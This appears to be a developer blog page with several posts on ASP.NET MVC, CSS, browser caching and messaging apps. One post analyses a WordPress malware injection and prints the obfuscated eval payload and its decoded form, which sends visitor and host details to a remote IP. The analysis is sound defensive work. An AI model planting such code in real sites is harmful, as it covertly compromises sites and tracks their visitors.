One of the most powerful features of ASP.NET MVC is its URL routing engine. The routing engine in ASP.NET MVC is used to route incoming requests to the correct controller action, but it can also generate URLs for you. This is normally done with the URL helper in views:

// Regular ASP.NET MVC:
@Url.Action("View", "Blog", new { id = 123 })
// With T4MVC:
@Url.Action(MVC.Blog.View(123))

This is great, as it means changing your routes will automatically update all the internal URLs throughout your site. If you're using T4MVC (which I strongly suggest), you also get compile time checking on your URLs, which means that it's literally impossible to have broken internal links (any invalid links will throw a compile error).

This is all well and good on the server side, but there's no equivalent on the client side, meaning that people often use one of these approaches:

  • Hard-code URL in JavaScript directly
  • Store the URL in a data attribute on the relevant element (or body)
  • Create a global JavaScript object containing all the URLs the page requires (for example, Jarret Meyer's approach)

Each of these approaches has its downsides. The last one is the most promising, and I had the idea of generalising this approach and making it into a library that can be dropped into any site. There are some existing projects that tackle this problem, the main one being Zack Owens' ASP.NET MVC JavaScript Routing. Zack's library looked good but I had two issues with it:

  • It's unnecessarily tightly coupled with jQuery, meaning you have to load the whole of jQuery just to use it, which is annoying if your site is just vanilla JavaScript or uses a library like PrototypeJS or MooTools instead.
  • It requires you to use a custom routing syntax rather than the standard ASP.NET MVC routing

I decided to write my own library to solve this problem. My library is called RouteJs, and it is available on NuGet. It supports ASP.NET MVC 2, 3 and 4. Basically, RouteJs consists of a small piece of JavaScript to handle building URLs, as well as some information about all the routes you want to expose. All of this is served using an ASP.NET handler, so you don't need to change your build scripts or anything like that. Simply drop it into your site.

Once loaded in your site, RouteJs provides a global Router object, similar to the URL helper that comes with ASP.NET MVC. For example, the same blog view URL can be generated with the following code:

var url = Router.action('Blog', 'View', { id = 123 });

It supports most of the common features of ASP.NET MVC routing, including areas, default values and simple constraints. It does not currently support ASP.NET WebAPI, but I'll definitely add support if someone requests it.

For more information, please see the readme on Github. Please let me know what you think!

Until next time,

— Daniel

Google used to offer some little widgets that you could embed on your site which would show if you were online or offline in Google Talk, and let people start a conversation directly from the web page. I used to scrape the HTML and grab my status from there to display it on my site. Unfortunately they deprecated them last year and pulled the service offline recently.

I thought it'd be useful and couldn't find anything similar so I started a site that would provide similar functionality. Currently it can show an online/offline icon, and provide the data in JSON format. I'm going to add some more functionality and make it more user-friendly as I get time to.

Here's a screenshot of how I display it on my site:

Screenshot of MyStatus information

Here's the URL: http://mystatus.im/

Technologies I'm using are Node.js, Express, Sequelize, and node-xmpp. This is my first live Node.js site.

Let me know what you think!

I've been using instant messaging for as long as I've had Internet access. The very first instant messaging program I used was Windows Live Messenger, back when it was called MSN Messenger. Over the last few years, I've watched their official Messenger client get progressively worse and more bloated, and more and more people moving away from it to other IM platforms such as Google Talk (which uses Jabber/XMPP, an open protocol). Now an era is coming to an end. Tomorrow is the day that Microsoft finally retires Windows Live Messenger and begins forcing all users to use Skype. This does make sense from a business perspective - They're getting rid of the old network that they make barely any money from, and moving everything to the one they acquired for $8.5 billion in 2011 and has 55 million users online concurrently.

However, from a technology perspective, this is definitely a huge step backwards. They're referring to the WLM to Skype migration as an "upgrade", I guess in the same way that moving from a mansion to a one-bedroom unit is also an "upgrade". The truth is that Skype really feels like a voice/video chat app with basic instant messaging capabilities added as an afterthought, probably because that's exactly what it is. Don't get me wrong, Skype is great for voice and video chats, but for instant messaging it's nowhere near as good as Windows Live Messenger. Skype is lacking a lot of features that are present in Windows Live Messenger, some of which include:

  • Custom emoticons
  • Easy extensibility. Windows Live Messenger has a large community and large number of addins available, such as Messenger Plus
  • Groups via Windows Live Groups. These are persistent groups similar to Facebook groups. Similar to a chat room except whenever someone comes online, they automatically appear in the group
  • Interoperability and third-party clients. Windows Live Messenger supports the XMPP protocol which makes writing third-party clients easy. Skype uses a closed-source protocol and has no third-party clients (this is why Pidgin doesn't support Skype). This is a huge one for me - I don't want to use separate programs for every single instant messaging network I use!
  • No web-based messenger, official or otherwise (like eBuddy). This ties in to the point above about third-party clients
  • Custom display names
  • Skype lets you sign in at multiple locations at once (like Windows Live Messenger) but there's no way to sign out from all locations at once (like if someone guesses your password and logs in as you)
  • File transfers and games that actually work
  • Voice clips (sending small sound bytes without having to start a full two-way conversation)
  • Remote assistance (as far as I know, Skype lets you show the other person your screen, but they can't take control)
  • Email notifications for Hotmail / Windows Live / Outlook accounts
  • Ironically, I used to find that the video quality in Windows Live Messenger was much better than Skype

And I'm sure there's many others that I've missed. Microsoft has had months to improve Skype so that it can even compete with Windows Live Messenger, but they have not done anything at all.

It's the end of an era. I'm rarely on Windows Live Messenger these days, but if you do have me as a contact, feel free to add me on Google Talk.

Until next time,

— Daniel

Back when IE 9 came out, it was the first major browser to start caching redirects to improve performance. The IE team wrote a detailed blog post about it, but they still got some backlash (mainly from people that didn't set correct no-cache headers on redirects with side effects, like login pages).

The recently released version of Safari for iOS 6 has started caching AJAX POST requests, with no notification to developers at all. Not only is this unexpected, but it goes against the HTTP 1.1 standard, which states:

9.5 POST

...

Responses to this method are not cacheable, unless the response includes appropriate Cache-Control or Expires header fields.

This means that if you have something like an edit page that uses AJAX to post the form, the first edit will work, but subsequent edits will return a cached "Success" message instead of sending the request to the server!

This is somewhat similar to Internet Explorer caching AJAX GET requests, except caching GET requests is nowhere near as dangerous. While GET requests are allowed to be cached, POST requests are not idempotent (they can have side effects) so they should never be cached. Sure, IE caches AJAX GET requests more heavily than other browsers, but this is allowed in the HTTP specs:

The response to a GET request is cacheable if and only if it meets the requirements for HTTP caching described in section 13.

Caching POST requests is horrible. How many times have you added no-cache headers to your POST pages? I'm going to have a guess and say never, since no other browser in the history of the World Wide Web has cached POST requests. This move has essentially broken the functionality of some AJAX-based edit forms, and developers might not notice the breakage initially. I hope this is a bug and not expected functionality, and it gets fixed at some point. Safari used to be a horrible browser with many DOM issues... I hope it's not heading this way again.

The original release of ASP.NET MVC used HTML helpers with a syntax like the following:

@Html.TextArea("Title")

These worked, but if you renamed the property in your model (for example, from “Title” to “Subject”) and forgot to update your view, you wouldn’t catch this error until you actually tried out the page and noticed your model isn’t populating properly. By this time, you might have users using the site and wondering why stuff isn’t working.

ASP.NET MVC 2 introduced the concept of strongly-typed HtmlHelper extensions, and ASP.NET MVC 3 extended this even further. An example of a strongly typed HtmlHelper is the following:

@Html.TextAreaFor(post => post.Title)

These allow you to write more reliable code, as view compilation will fail if you change the field name in your model class but forget to change the field name in the view. If you use precompiled views, this error will be caught before deployment.

Creating your own

The built-in helpers are good, but quite often it’s nice to create your own helpers (for example, if you have your own custom controls like a star rating control or rich-text editor).

Read more ⇒

Modern browsers have support for RGBA colours, allowing you to have semi-transparent background colours. Unfortunately, this only works in awesome browsers (everything except IE 8 and below). However, IE does support a custom gradient filter. Whilst it's commonly used to render gradients (obviously), it supports alpha transparency. If you set the start and end colours to be the same, this has the same effect as setting an alpha value on the colour.

This involves quite a lot of CSS for each alpha colour you want to use. We can automate this tedious code generation through a LESS mixin. If you're still using 'pure' CSS, I'd highly suggest looking into LESS and SASS, they're extremely handy. In any case, I use a mixin similar to the following:

.rgba(@colour, @alpha)
{
	@alphaColour: hsla(hue(@colour), saturation(@colour), lightness(@colour), @alpha);
	@ieAlphaColour: argb(@alphaColour);
	
	background-color: @colour; // Fallback for older browsers
	background-color: @alphaColour; 
	
	// IE hacks
	zoom: 1; // hasLayout
	background-color: transparent\9;
	-ms-filter:  "progid:DXImageTransform.Microsoft.gradient(startColorstr=@{ieAlphaColour}, endColorstr=@{ieAlphaColour})"; // IE 8+
	    filter: ~"progid:DXImageTransform.Microsoft.gradient(startColorstr=@{ieAlphaColour}, endColorstr=@{ieAlphaColour})"; // IE 6 & 7 
	
}

Note that IE requires the element to have layout in order to apply filters to it (hence the zoom: 1 hack), and IE 8 changed the filter syntax to use -ms-filter instead. This LESS mixin can be used as follows:

#blah
{
        .rgba(black, 0.5);
}

This will set the element to a 50% black background. This mixin could be converted to SASS quite easily, too. Ideally I would have liked to apply the IE styles in a better way (like using conditional comments to set classes on the element) but I couldn't get this approach working with LESS.

Hope this helps someone!

Until next time,
— Daniel

Over the past few months, there have been a few vulnerabilies in PHP scripts utilised by various WordPress themes. One of the largest hacks was back in August, when a Remote File Inclusion (RFI) vulnerability was found in TimThumb, a thumbnail generation script used by a lot of WordPress themes. This vulnerability allowed attackers to run any PHP code on vulnerable sites. As a result of this, thousands of sites were hacked.

The most common result of your site being hacked through like this is having some sort of malicious code added to your PHP files. This is often invisible, and people don't notice that their site has malicious code lurking in it until much later. However, sometimes the hacked code does have errors in it. One particular payload is being referred to as the "'Cannot redeclare' hack", as it causes an error like the following to appear in your site's footer:

Fatal error: Cannot redeclare _765258526() (previously declared in /path/to/www/wp-content/themes/THEME/footer.php(12) : eval()'d code:1) in /path/to/www/index.php(18) : eval()'d code on line 1

This particular hack affects all the index.php and footer.php files in your WordPress installation. If you are affected by this hack and open any index.php or footer.php file, you'll see code that starts like this: (the full code is on Pastebin)

<?php eval(gzuncompress(base64_decode('eF5Tcffxd3L0CY5Wj...

Decoding the Code

If you're this far, I assume you're a PHP developer (or at least know the basics of PHP). The malicious code above is actually highly obfuscated PHP code, which means that the actual intent of the code is hidden and it looks like jibberish. The eval statement runs arbitrary PHP code, so this line of code will basically base64 decode and then run the big block of code. So... what does the code actually do? Obviously we can't tell with it in its current state. It does take a bit of effort, but this code can be "decoded" relatively easy. Obfuscation is not one-way, it can always be undone. While we can't get back the original variable names, we can see what functions the code is executing.

The first step in decoding this code is replacing all instances of eval with echo, and then running the script. This should output the code being executed, instead of actually executing it. After doing this, I ended up with something like the following:

$GLOBALS['_2143977049_']=Array();
function _765258526($i){$a=Array();return base64_decode($a[$i]);}

eval(gzuncompress(base64_decode('eF5Tcffxd3L0CY5WjzcyMjM...

Great, another layer of gzipped/base64'd obfuscation. This technique is common with obfuscated code like this. Multiple layers of obfuscation makes it harder for someone to decode the code, as it requires more effort. I guess the "bad guys" think that people will get tired of trying to unobfuscate the code, and give up, or something like that. When a case like this is encountered, keep replacing eval with echo and re-running the script, until there's no eval statements left. After decoding all the eval'd code and formatting the resulting code, I ended up with this. While there's readable code there now, it's still obfuscated.

Once you're this far, if you look closely at the code, you'll notice that a lot of it is encoded using base64. The next step to unobfuscating thid code is to decode all base64-encoded text. That is, find all instances of base64_decode(...) and replace it with the base64 decoded version. Once I did that, I ended up with this:

<?php 
$GLOBALS['_226432454_']=Array();
function _1618533527($i)
{
        return '91.196.216.64';
}
 
$ip=_1618533527(0);
$GLOBALS['_1203443956_'] = Array('urlencode');
function _1847265367($i)
{
        $a=Array('http://','/btt.php?ip=','REMOTE_ADDR','&host=','HTTP_HOST','&ua=','HTTP_USER_AGENT','&ref=','HTTP_REFERER');
        return $a[$i];
}
$url = _1847265367(0) .$ip ._1847265367(1) .$_SERVER[_1847265367(2)] ._1847265367(3) .$_SERVER[_1847265367(4)] ._1847265367(5) .$GLOBALS['_1203443956_'][0]($_SERVER[_1847265367(6)]) ._1847265367(7) .$_SERVER[_1847265367(8)];
$GLOBALS['_399629645_']=Array('function_exists', 'curl_init', 'curl_setopt', 'curl_setopt', 'curl_setopt', 'curl_exec', 'curl_close', 'file_get_contents');
function _393632915($i)
{
    return 'curl_version';
}
if ($GLOBALS['_399629645_'][0](_393632915(0))) 
{
        $ch=$GLOBALS['_399629645_'][1]($url);
        $GLOBALS['_399629645_'][2]($ch,CURLOPT_RETURNTRANSFER,true);
        $GLOBALS['_399629645_'][3]($ch,CURLOPT_HEADER,round(0));
        $GLOBALS['_399629645_'][4]($ch,CURLOPT_TIMEOUT,round(0+0.75+0.75+0.75+0.75));
        $re=$GLOBALS['_399629645_'][5]($ch);
        $GLOBALS['_399629645_'][6]($ch);
}
else
{
        $re=$GLOBALS['_399629645_'][7]($url);  
}
echo $re;
?>

Now you simply need to go through the code and "execute it in your head". Follow the execution path of the code, and see which variables are used where. There's some usage of arrays to disguise certain variables. What I did was first replaced the two function calls (_1618533527 and _1847265367), and then replaced the array usages (1203443956, 399629645 and 399629645). Substitute the variables in the places they're used, and the code should be fully obfuscated. Once fully unobfuscated, the code came down to the following:

<?php
$url = 'http://91.196.216.64/btt.php?ip=' . $_SERVER['REMOTE_ADDR'] . '&host=' . $_SERVER['HTTP_HOST'] . '&ua=' . urlencode($_SERVER['HTTP_USER_AGENT']) . '&ref=' . $_SERVER['HTTP_REFERER'];

if (function_exists('curl_version'))
{
	$ch = curl_init($url);
	curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
	curl_setopt($ch, CURLOPT_HEADER, 0);
	curl_setopt($ch, CURLOPT_TIMEOUT, 3);
	$re = curl_exec($ch);
	curl_close($ch);
}
else
{
	$re = file_get_contents($url);
}
echo $re;

So, what it's actually doing is sending a request to 91.196.216.64 (a server located in Russia), telling it your site's hostname, your user agent (what browser you're using), and the referer (how you got to the page). This is not directly malicious (this code can't directly do anything bad), which makes it interesting. My theory is that the developer of the worm is using this to create a list of all vulnerable sites, to use them for further hacks in the near future.

So, that's it. Hopefully this post wasn't too boring (and perhaps you even learnt how to unobfuscate code like this). As more people learn how to unobfuscate code like this, I suspect that the "hackers" will keep getting smarter and devising more clever code obfuscation techniques. Until then, finding out what the code actually does is relatively quick and easy, as I've demonstrated here.

Until next time,
— Daniel

Am I the only person that cringes when I see HTML like this?

<div class="h1Title"><div class="spriteicon_img_mini" id="icon-name_mini"></div>Page Title</div>

Or like this?

<!--Start Footer-->
<div id="heading-bottom_bg" class="spriteheading_bg footer">
	<ul class="links footer_ul">
		<li class="footer_li"><a class="footer_li_a bottomlink" href="../index.html">Home</a></li>
		<li class="footer_li"><span class="footer" style="font-size:18px;">&#9642;</span></li>
		...
		<li class="footer_li"><a class="footer_li_a bottomlink" href="/logout/">Log out</a></li>
	</ul>
</div>

Notice the classes on all those elements. Really? A web developer that doesn't know about the

tag or CSS descendant/child selectors? Why do people feel the need to use
tags for everything, when there's other more semantic tags available? It really doesn't make sense to me; some of the first HTML tags I learnt were

and

.

For what it's worth, this is how I'd rewrite those two blocks of HTML:

<h1 class="icon-name">Page Title</h1>
<!--Start Footer-->
<div id="footer">
	<ul>
		<li><a href="../index.html">Home</a> &#9642;</li>
		...
		<li><a href="/logout/">Log out</a></li>
	</ul>
</div>

It's good to keep your HTML and CSS selectors as simple as possible. There's no need for a "footer_li" class when you can just use "#footer li" in your CSS. The "icon-name" CSS class on the

is used for a CSS sprite to display next to the heading. Also, as an alternative, the separator (▪) that was originally in a after all the footer items can easily be added via the :after pseudo selector instead of being in the
  • .

    It's really frustrating that there's so many "web developers" that don't seem to know basic HTML. It's okay if you're just starting to learn, this is fair enough. The HTML I "wrote" when I started web development was horrendous. And by "wrote" I mean "created in FrontPage 98". But it's another thing altogether to be a developer for a number of years and still write ugly HTML like this.

    Ugly JavaScript seems to be way more common, though. But that's a rant for another day.

  • So I thought I'd finally write a little blog post about a Twitter bot I made a while ago. A few people emailed me asking for the source code, so I had previously posted about it on webDevRefinery, but never on my own blog. Basically all the bot does is search for whenever people mention "over 9000" or "over nine thousand", and replies with "WHAT, NINE THOUSAND?!". Pretty simple, but I wanted to learn about using the Twitter API. It seems to have inspired the creation of other Twitter bots, like AnnoyingNavi and The Spacesphere, which I think is pretty cool. 😃.

    The source code is available as a Gist on Github. It is written in PHP and requires the PECL OAuth extension to be installed. I think it's a pretty good example of a simple "search and reply" Twitter bot, that could easily be extended to do more useful things.

    Until next time,

    — Daniel

    I was rewriting my site recently (to use the Kohana framework instead of WordPress), and I decided to write my own blog system at the same time. Finally, I've finished a basic version of it, and it's now live! This site is running on it, so hopefully there's no major issues! I do still love WordPress, but as a developer, it's often fun to create your own stuff (you know exactly what the code is doing, and it does exactly what you want). The code for this whole website is now available on Github, maybe some of you would find it interesting (especially if you're doing something similar yourself). Still a bit rough around the edges, but it's working fine. I've still got a bit I'd like to do with the blog (like improving the administration section). 😃

    My old blog used to have a "microblog" section where I'd occassionally post photos and stuff. I've moved all that onto a Tumblr account, although now I'm thinking I should have used Posterous instead. Tumblr's uptime seems quite bad. I really don't understand why it's so popular... It seems like it's mainly the community rather than the site itself.

    Eventually I might even post a proper blog article to here. Or to my other blog with my girlfriend 😃

    Until then,

    — Daniel

    1 2 3 4 5 6 7 8 9